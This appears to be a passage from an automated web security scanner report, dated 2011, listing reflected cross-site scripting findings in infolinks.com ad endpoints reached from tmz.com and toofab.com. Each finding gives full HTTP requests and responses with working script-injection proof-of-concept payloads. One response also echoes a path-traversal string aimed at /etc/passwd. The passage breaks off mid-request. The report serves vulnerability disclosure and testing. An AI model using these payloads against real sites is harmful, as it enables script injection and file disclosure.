YAHOO_one_uh.popularSearches({"error":{"lang":"en-US","description":"Invalid value for variable 'limit' expecting an integer got '1975e8<script>alert(1)</script>8e1784da2c'"}});

4.153. http://router.infolinks.com/gsd/1316238723013.0 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://router.infolinks.com
Path:   /gsd/1316238723013.0

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c817e<script>alert(1)</script>328a2b755f1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gsd/1316238723013.0?callback=INFOLINKS.gsdCallbackc817e<script>alert(1)</script>328a2b755f1&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 00:50:40 GMT
Connection: close

INFOLINKS.gsdCallbackc817e<script>alert(1)</script>328a2b755f1({rid:'8539b123-083b-4c4f-88aa-0b6e254cc58a',rs:'rt1904.infolinks.com',makey:'45405e42435e4142435e4140465f414341464242404746414545405f69727076',ms:'1305',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );

4.154. http://router.infolinks.com/gsd/1316238747946.0 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://router.infolinks.com
Path:   /gsd/1316238747946.0

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6a0db<script>alert(1)</script>537547a0793 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gsd/1316238747946.0?callback=INFOLINKS.gsdCallback6a0db<script>alert(1)</script>537547a0793&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F2011%2F09%2F16%2Fexclusive-melissa-rivers-splits-with-boyfriend%2F&jsv=221.3.5b HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 00:51:05 GMT
Connection: close

INFOLINKS.gsdCallback6a0db<script>alert(1)</script>537547a0793({rid:'37868f9f-f929-4208-ad72-c0399ed20ffc',rs:'rt1303.infolinks.com',makey:'4b4e504c4d504f4c4d504f4e48514f4d4f484c4c4e494648484a4d5169767f7e',ms:'1305',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );

4.155. http://router.infolinks.com/gsd/1316238789101.0 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://router.infolinks.com
Path:   /gsd/1316238789101.0

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f71aa<script>alert(1)</script>a749c541a4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gsd/1316238789101.0?callback=INFOLINKS.gsdCallbackf71aa<script>alert(1)</script>a749c541a4&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2Fnews%2F&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 262
Date: Sat, 17 Sep 2011 00:51:47 GMT
Connection: close

INFOLINKS.gsdCallbackf71aa<script>alert(1)</script>a749c541a4({rid:'9ec68ba8-daa0-4f64-9dfd-e1b4fcda2b2c',rs:'rt1302.infolinks.com',makey:'1316081415081714150817161009171517101414161e14111310150969707372',ms:'1305',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );

4.156. http://router.infolinks.com/gsd/1316238970770.0 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://router.infolinks.com
Path:   /gsd/1316238970770.0

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6d7c0<script>alert(1)</script>807ea01e6bb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gsd/1316238970770.0?callback=INFOLINKS.gsdCallback6d7c0<script>alert(1)</script>807ea01e6bb&pid=159065&wsid=0&pdom=www.tmz.com&purl=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&jsv=221.3.5b HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 262
Date: Sat, 17 Sep 2011 00:57:36 GMT
Connection: close

INFOLINKS.gsdCallback6d7c0<script>alert(1)</script>807ea01e6bb({rid:'e41c5bc1-607e-4eff-9b5c-ebf6875eb0e8',rs:'rt1803.infolinks.com',makey:'4346584445584744455847464059474547404444474741414747475969747674',ms:'1704',scl:true,wd:{drm:'POST',ha:{cls:['post']}}} );

4.157. http://router.infolinks.com/gsd/1316239040251.0 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://router.infolinks.com
Path:   /gsd/1316239040251.0

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ff2bd<script>alert(1)</script>2eed346dbcf was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gsd/1316239040251.0?callback=INFOLINKS.gsdCallbackff2bd<script>alert(1)</script>2eed346dbcf&pid=159065&wsid=0&pdom=www.tmz.com&purl=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F%3Fadid%3Dhero3&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 00:59:12 GMT
Connection: close

INFOLINKS.gsdCallbackff2bd<script>alert(1)</script>2eed346dbcf({rid:'6a030d7f-3ffa-45f9-b35d-d05a342d0f11',rs:'rt1302.infolinks.com',makey:'45405e42435e4142435e4140465f414341464242414247424442445f6974737f',ms:'1704',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );

4.158. http://router.infolinks.com/gsd/1316239125269.0 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://router.infolinks.com
Path:   /gsd/1316239125269.0

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c225d<script>alert(1)</script>c979af99300 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gsd/1316239125269.0?callback=INFOLINKS.gsdCallbackc225d<script>alert(1)</script>c979af99300&pid=159065&wsid=0&pdom=www.tmz.com&purl=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%2F%3Fadid%3Dhero1&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 01:01:43 GMT
Connection: close

INFOLINKS.gsdCallbackc225d<script>alert(1)</script>c979af99300({rid:'bc3821af-c889-497d-ad21-4b884080eee9',rs:'rt1901.infolinks.com',makey:'47425c40415c4340415c4342445d434143444040434640414145475d69737275',ms:'1805',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );

4.159. http://router.infolinks.com/gsd/1316239185968.0 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://router.infolinks.com
Path:   /gsd/1316239185968.0

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ef5a2<script>alert(1)</script>62d6a50225d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gsd/1316239185968.0?callback=INFOLINKS.gsdCallbackef5a2<script>alert(1)</script>62d6a50225d&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2Fcategory%2Fceleb-couples%2F&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 01:08:15 GMT
Connection: close

INFOLINKS.gsdCallbackef5a2<script>alert(1)</script>62d6a50225d({rid:'fbcb16da-871a-4353-9f5b-374c34a2c8b3',rs:'rt1802.infolinks.com',makey:'45405e42435e4142435e4140465f414341464242414841454942495f6974747e',ms:'1704',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );

4.160. http://router.infolinks.com/gsd/1316239193603.0 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://router.infolinks.com
Path:   /gsd/1316239193603.0

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fe53e<script>alert(1)</script>cbd73a72ca0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gsd/1316239193603.0?callback=INFOLINKS.gsdCallbackfe53e<script>alert(1)</script>cbd73a72ca0&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F2011%2F09%2F15%2Fashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos%2F&jsv=221.3.5b HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 01:08:47 GMT
Connection: close

INFOLINKS.gsdCallbackfe53e<script>alert(1)</script>cbd73a72ca0({rid:'db5a6b31-44ef-4f3c-ad65-34708253120a',rs:'rt1902.infolinks.com',makey:'47425c40415c4340415c4342445d434143444040434a464a42434b5d69747274',ms:'1704',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} );

4.161. http://rt1302.infolinks.com/action/doq.htm [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1302.infolinks.com
Path:   /action/doq.htm

Issue detail

The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 73873<script>alert(1)</script>96519b5c9d9 was submitted in the rid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239041277.1 HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 9824
Origin: http://www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=3

makey=4b4e504c4d504f4c4d504f4e48514f4d4f484c4c4f4e494b49464d51697f7277&pimgs=justin%20timberlake%7Cnot%20my%20penis%21%7Cron%20artest%7Cname%20change%20official%7Csay%20hello%20to%20world%20peace%7Cmi
...[SNIP]...
cy%7Cterms%20of%20use%7Cadvertising%20inquiries%7Cmedia%20inquiries%7Chpmg%20news%7Cvenue%20name%7Creview%7Cwebsite%7Cdirections%7Cmore&jsv=222%2E0%2E4&rid=da106062%2D18d8%2D449e%2D805a%2Dc1785d15d58b73873<script>alert(1)</script>96519b5c9d9&crtw=0&by=f&crtss=30&phdrs=%7Creader%20comments%7Cthe%20laundry%20list%7Ctmz%20sports%7Cbeauty%7Ctmz%20on%20tv%7Cfeatured%20in%20exclusive%7Cexclusive%20must%20reads%7Ctoo%20fab%21%7Chot%20photo%20ga
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid="8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec"; Version=1; Domain=infolinks.com; Max-Age=2147483647; Expires=Thu, 05-Oct-2079 04:14:37 GMT; Path=/
Set-Cookie: cnoi=74; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:14:37 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2302
Date: Sat, 17 Sep 2011 01:00:30 GMT
Connection: close

data=({rid:'da106062-18d8-449e-805a-c1785d15d58b73873<script>alert(1)</script>96519b5c9d9',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'things':{auth:{ssd:'UPwq7UoNKadKvvbzD00CNRdwrWSPYZs_PO3spp54Imzon1y1ud
...[SNIP]...

4.162. http://rt1302.infolinks.com/action/getads.htm [lid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1302.infolinks.com
Path:   /action/getads.htm

Issue detail

The value of the lid request parameter is copied into the HTML document as plain text between tags. The payload 67fef<script>alert(1)</script>6a7e468dd77 was submitted in the lid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /action/getads.htm?lid=267fef<script>alert(1)</script>6a7e468dd77&rid=da106062-18d8-449e-805a-c1785d15d58b&jsv=222.0.4&rts=1316239066211&bdc=1&cfv=10.3&prod_t=intext&sdata=make%20a%20move&ssd=2hAWURkIJ_4Kds6UXz8WznN_QzZNa4LBfSz7zrBLnZj6T2tXKUdAdSXXIuL_seS2dbU_ZFCbwoh9YlYKCjDYoQOhoiVPotApHz37yLFQrUZBj7NspVySPoNBTt03nMBOTHL4pxnayBF8i9niJ3xJY-bKwwT5OoYGYMJdaBrlT64ForO97xbWXA&sk=70&cs=9XaOKKLdbnq0zTFAwKWvjw HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cpc=100; Domain=infolinks.com; Expires=Sat, 17-Sep-2011 01:59:51 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 846
Date: Sat, 17 Sep 2011 00:59:50 GMT
Connection: close


INFOLINKS.setAdData( {
lid : "267fef<script>alert(1)</script>6a7e468dd77",sentence : "make+a+move",
width : 0,height : 0,ads : [
{
template : 'text',

title : 'Mover',
text : 'Compare Top-Rated Mover In Your Area. Get
...[SNIP]...

4.163. http://rt1701.infolinks.com/action/doq.htm [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1701.infolinks.com
Path:   /action/doq.htm

Issue detail

The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload b1512<script>alert(1)</script>2de489fe3894dc8d1 was submitted in the rid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /action/doq.htm?pcode=utf-8&r=1316238789823.1&purl=http%3A%2F%2Fwww%2Etoofab%2Ecom%2Fnews%2F&makey=47425c40415c4340415c4342445d434143444040424a40464147405d69737677&ref=www%2Etoofab%2Ecom%2F2011%2F09%2F16%2Fexclusive%2Dmelissa%2Drivers%2Dsplits%2Dwith%2Dboyfriend%2F&ptitle=hollywood%20news%2Cred%20carpet%20fashion%20and%20celebrity%20hairstyles%20%7C%20toofab%2Ccom&pid=159065&wsid=1&by=f&ptxt=latest%7Cnews%7Cmost%7Cread%7C%C2%A9%202011%20ehm%20productions%7Cinc%7Call%20rights%20reserved%7Creproduction%20in%20whole%20or%20in%20part%20without%20permission%20is%20prohibited%7Cin%20partnership%20with%20tmz%7Ccom%7C&jsv=222%2E0%2E4&page%5Fkeyw=hollywood%20news%2Cred%20carpet%20fashion%2Ccelebrity%20hairstyles%2Ccelebrity%20beauty%20buzz%2Ccelebrity%20gossip%2Cacademy%20awards%2Coscars%2Ccelebrity%20makeup%2Ccelebrity%20bikini%20bodies%2Ccelebrity%20style%2Ccelebrity%20dresses%2Ccelebrity%20jewelry%2Ccelebrity%20handbags&crtw=0&twnum=28&crtss=30&pdesc=get%20the%20latest%20celebrity%20gossip%2Chollywood%20news%2Ccovering%20red%20carpet%20fashion%20and%20events%2Ccelebrity%20hairstyles%20and%20celebrity%20beauty%20buzz%20at%20toofab%21&crt=0&pimgs=toofab%7Clove%20it%7Clive%20it%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7Csnooki%20slams%20into%20italian%20cop%7Cwatch%20the%20accident%21%7Cjill%20zarin%7Cno%20pink%20slip%20for%7Creal%20housewives%7Cvictoria%20beckham%20%26%20baby%20harper%27s%20shopping%20spree%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7Ccelebs%20love%20camilla%20and%20marc%7Cjanuary%20jones%20gives%20birth%20to%20baby%20boy%7Cmark%20ballas%20and%20pia%20tosano%20split%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7Cnew%20york%20fashion%20week%20finale%7Cfall%20tv%20calendar%7Ca%20guide%20to%20new%20%26%20returning%20shows%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7Ctoday%27s%20celebrity%20birthdays%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7Cjane%20lynch%7Cwhat%20should%20she%20wear%20at%20the%20emmys%7Chot%20shots%7Cseptember%2016%7C2011%7Cgeorge%20clooney%27s%20many%20former%20flames%7Cemmy%20awards%7Cred%20carpet%20regulars%20through%20the%20years%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7C2011%20emmy%20awards%7Cwho%20should%20win%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7Ctoofab&rts=1316238789824&csilv=4%2E0%2E60531%2E0&plinks=news%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7C1%20comment%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7C14%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7C3%20comments%7Csnooki%20slams%20into%20italian%20cop%7Cwatch%20the%20accident%21%7C0%20comments%7Cjill%20zarin%7Cno%20pink%20slip%20for%7Creal%20housewives%7C13%20comments%7Cvictoria%20beckham%20%26%20baby%20harper%27s%20shopping%20spree%7C2%20comments%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7C8%20comments%7Ccelebs%20love%20camilla%20and%20marc%7C0%20comments%7Cjanuary%20jones%20gives%20birth%20to%20baby%20boy%7C0%20comments%7Cmark%20ballas%20and%20pia%20tosano%20split%7C0%20comments%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7C188%20comments%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7C0%20comments%7Cnew%20york%20fashion%20week%20finale%7C1%20comment%7Cfall%20tv%20calendar%7Ca%20guide%20to%20new%20%26%20returning%20shows%7C0%20comments%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7C0%20comments%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7C0%20comments%7Ctoday%27s%20celebrity%20birthdays%7C0%20comments%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7C0%20comments%7Cjane%20lynch%7Cwhat%20should%20she%20wear%20at%20the%20emmys%7C0%20comments%7Chot%20shots%7Cseptember%2016%7C2011%7C2%20comments%7Cgeorge%20clooney%27s%20many%20former%20flames%7C0%20comments%7Cemmy%20awards%7Cred%20carpet%20regulars%20through%20the%20years%7C0%20comments%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7C0%20comments%7C2011%20emmy%20awards%7Cwho%20should%20win%7C0%20comments%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7C188%20comments%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7C74%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7C38%20comments%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7C28%20comments%7Cevening%20quickies%7Cjessica%20simpson%27s%20wedding%20possibly%20put%20off%7Cindefinitely%7Cscarlett%20johansson%27s%20nude%20pics%20inspire%20%23scarlettjohanssoning%7C12%20ways%20to%20impress%20joe%20manganiello%7Cnow%20that%20he%20is%20single%7Cfrom%20the%20frisky%7Clikes%20or%20yikes%7Cour%20favorite%20entertainment%20stories%20of%20the%20week%7Celisabeth%20moss%7Cso%20proud%7Cof%20new%20mom%20january%20jones%7Cx%20factor%7Ctrailer%7Clikes%20or%20yikes%7Cfrom%20ivillage%7Cbooboo%20%26%20fivel%20stewart%7Cabduction%7Cpremiere%21%7Cnicola%20peltz%20walks%20the%7Cboardwalk%20empire%7Chonor%20society%7Ca%20tale%20of%20risky%20business%7Cpt%7C2%7Ccover%20art%21%7Cfrom%20just%20jared%20jr%7C50%20cent%20wants%20to%20achieve%20hunger%20relief%20goal%20in%20two%2Dand%2Da%2Dhalf%20years%7Cjoss%20stone%20fostering%20a%20dog%7Cnick%20cannon%20doesn%27t%20want%20kids%20in%20show%20business%7Cfrom%20young%20hollywood%7Cmartha%20marcy%20may%20marlene%7Ccrazy%20title%7Ccrazy%2Dlooking%20movie%7Cvideo%7Cemmys%202011%20preview%7C10%20reasons%20to%20watch%20the%20awards%7Cglee%7Cpremiere%20spoilers%7Cwhat%20to%20expect%20in%20the%20first%20show%7Cfrom%20the%20stir%7Cnatalie%20portman%20fawns%20over%20adorable%20baby%20aleph%20and%20shares%20a%20loving%20stroll%20with%20benjamin%20in%20switzerland%21%7Cjames%20marsden%20always%20wanted%20kate%20bosworth%20to%20play%20his%20straw%20dogs%20wife%7Cjennifer%20aniston%20and%20justin%20theroux%20share%20a%20sweet%20lunch%2